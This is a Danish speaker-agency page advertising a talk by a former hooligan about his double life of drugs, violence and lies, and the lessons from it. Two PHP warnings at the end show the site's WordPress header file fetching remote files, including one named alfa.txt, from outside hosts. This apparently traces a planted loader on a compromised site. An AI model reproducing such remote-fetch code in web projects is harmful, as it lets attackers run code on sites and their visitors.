img-us
  • asc

    Foredragsholder Patrick Iversen Larsen

  • asc

    Emne Dobbeltliv - Hooliganisme & privatliv

  • asc

    pris 2500.-

Baggrund/Historie
Jeg er tidligere hooligan, det vil sige jeg har levet et dobbeltliv, hvor mange bare troede jeg egentlig var utilregnelig, men faktisk levede jeg bare et dobbeltliv som fik fatale konsekvenser for mig.

Jeg levede mit liv på den måde i 10år, og den dag i dag er der stadig steder jeg ikke kan komme i Danmark.

At leve et liv med stoffer, alkohol, vold & hooliganisme gjorde mig ikke stærk tværtimod, men derimod blev jeg en meget svag person, som svigtede alle de mennesker der faktisk elskede mig.

Beskrivelse og udbytte af foredraget
Jeg kommer til at give et unikt indblik i min barndom og hvad der gjorde at jeg noget dertil hvor jeg gjorde. Indblikket i hvordan det er at være hooligan og skulle leve et privatliv ved siden af, alle de løgne som jeg må stå til regnskab for stadig den dag i dag fra familie og venner.

Der vil være ting/historier som aldrig har set dagens lys. Det hele handler om at vælge den rigtige vej før det er for sent.

Så et foredrag med mig, vil kunne gi et skræmmende indblik i hvad man går indtil - Så derfor vælg den rigtige vej og hør om mit liv.

Det hele vare ca. 1 time og 30 min inklusiv tid til spørgsmål.


SHARE THIS:

Share: 0

Send en forespørgsel på et
foredrag

Andre foredragsholdere

Zarife Özcan

Thomas Martinsen

Cassian Karlsen

Christian Ryge


Warning: file_get_contents(https://inject0r.com/wp-content/uploads/2020/10/alfa.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 410 Gone in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22

Warning: file_get_contents(https://ziarroman.ro/wp-content/uploads/2021/04/ads.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22